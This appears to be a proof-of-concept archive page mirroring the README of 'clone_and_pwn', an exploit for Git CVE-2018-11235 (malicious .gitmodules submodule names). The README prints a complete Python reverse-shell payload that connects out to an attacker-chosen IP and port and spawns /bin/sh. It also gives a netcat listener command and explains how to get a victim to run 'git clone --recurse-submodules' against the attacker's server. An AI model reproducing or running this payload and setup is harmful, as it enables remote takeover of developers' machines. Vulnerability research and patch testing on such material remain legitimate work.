Associated Vulnerability
Title:Git 安全漏洞 (CVE-2018-11235)Description:Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。 Git中存在安全漏洞,该漏洞源于在将子模块名称添加到$GIT_DIR/modules目录下时,程序没有正确的验证来自不可信.gitmodules文件的子模块名称。远程攻击者可借助特制的.gitmodules文件利用该漏洞执行任意代码。以下版本受到影响:Git 2.13.7之前版本,2.14.4之前的2.14.x版本,2.15.2之前的2.15.x版本,2.16.4之前的2.16.x版本,2.1
Description
Exploits CVE-2018-11235
Readme
Headers
=========
Exploit Title: Clone and Pwn<br />
Date: June 4th, 2018<br />
Exploit Author: Alejandro Caceres<br />
Vendor Homepage: https://git-scm.com/<br />
Software Link: https://git-scm.com/downloads<br />
Version: arbitrary code is executed on git client versions In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1<br />
Tested on: Linux: Ubuntu, Mint, MacOSX<br />
CVE : CVE-2018-11235<br />
Exploit for CVE-2018-11235 Usage
==============================
CVE-2018-11235, dubbed clone and pwn here, creates a malicious git repo that exploits a bug in git. When the repo is cloned using the
--recurse-submodules flag, arbitrary code is executed on git client versions In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before
2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1.
To use this module simply put it on a server with direct internet access (e.g. AWS, digital ocean) and pop open `evil.sh`. It will look
something like the following:
```
#!/usr/bin/python
EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080
#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
Set EXTERN_IP and EXTERN_PORT to the IP (external) and port you'd like to receive your reverse shell on. A reverse shell can be received with something like:
`nc -l <EXTERN_IP> EXTERN_PORT` e.g. `nc -l 193.23.23.32 8080`
Or with Metasploit's generic shell module. Once the user has run the command `git clone --recurse-submodules git://<your ip>/repo dest_dir` you will receive a reverse shell.
If you're having trouble running multiple times (or after a failed attempt) check the following:
- Run ./clean.sh, note this will delete all data in /tmp
- check the processes with `ps aux | grep git` to ensure you aren't already running gitdaemon. Kill any gitdaemon processes.
Acknowledgements
----------------
Code derived from [@peff](https://github.com/peff)'s [git patch][] (look for
the `t/t7415-submodule-names.sh` test file).
As such, this repository is published under the GNU General Public License
version 2.
Additional fix for older versions of git courtesy of
[@atorralba](https://github.com/atorralba)
([details in this post](https://atorralba.github.io/CVE-2018-11235/)).
[git patch]: https://github.com/git/git/commit/0383bbb9015898cbc79abd7b64316484d7713b44
This script adapted from https://github.com/Rogdham/CVE-2018-11235, much love and credit
=======
# clone_and_pwn
Exploits CVE-2018-11235
By @_hyp3ri0n and @mehaase
File Snapshot
[4.0K] /data/pocs/73db323a9af7618d38b75b668d353d517ef77218
├── [1.1K] build.sh
├── [ 55] clean.sh
├── [ 331] evil.py
└── [2.6K] README.md
0 directories, 4 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.